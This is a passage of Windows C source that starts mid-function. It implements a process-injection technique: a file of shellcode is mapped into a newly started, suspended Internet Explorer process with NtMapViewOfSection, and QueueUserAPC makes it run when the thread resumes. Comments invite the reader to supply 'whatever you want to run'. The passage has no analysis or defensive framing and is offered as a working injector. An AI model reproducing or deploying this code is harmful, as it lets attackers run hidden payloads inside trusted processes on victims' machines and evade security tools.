    DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )
{
    NTSTATUS Status;
    LARGE_INTEGER SectionOffset;
    SIZE_T ViewSize;   // SIZE_T to match the SIZE_T* parameter of NtMapViewOfSection
    ULONG Protect;
    LPVOID ViewBase;
    // convert the offset
    SectionOffset.LowPart = dwFileOffsetLow;
    SectionOffset.HighPart = dwFileOffsetHigh;
    // save the size and the base address
    ViewBase = lpBaseAddress;
    ViewSize = dwNumberOfBytesToMap;
    // convert the flags into NT protection attributes
    if (dwDesiredAccess & FILE_MAP_WRITE)
    {
        Protect = PAGE_READWRITE;
    }
    else if (dwDesiredAccess & FILE_MAP_READ)
    {
        Protect = PAGE_READONLY;
    }
    else if (dwDesiredAccess & FILE_MAP_COPY)
    {
        Protect = PAGE_WRITECOPY;
    }
    else
    {
        Protect = PAGE_NOACCESS;
    }
    // map the section
    Status = NtMapViewOfSection(hFileMappingObject,
        hProcess,
        &ViewBase,
        0,
        0,
        &SectionOffset,
        &ViewSize,
        ViewShare,
        0,
        Protect);
    if (!NT_SUCCESS(Status))
    {
        // failed
        return NULL;
    }
    // return the base address
    return ViewBase;
}
int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
    HMODULE hDll = LoadLibrary( "ntdll.dll" );
    NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
    // get the shellcode, whatever you want to run
    HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
    // start the target process
    STARTUPINFO st;
    ZeroMemory (&st, sizeof(st));
    st.cb = sizeof (STARTUPINFO);
    PROCESS_INFORMATION pi;
    ZeroMemory (&pi, sizeof(pi));
    CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
    // inject the shellcode into the target process's address space
    LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
    // queue a new APC that is the first thing executed when the target thread resumes
    QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
    ResumeThread (pi.hThread);
    CloseHandle (hFile);
    CloseHandle (hMappedFile);
    CloseHandle (pi.hThread);
    CloseHandle (pi.hProcess);
    return 0;
}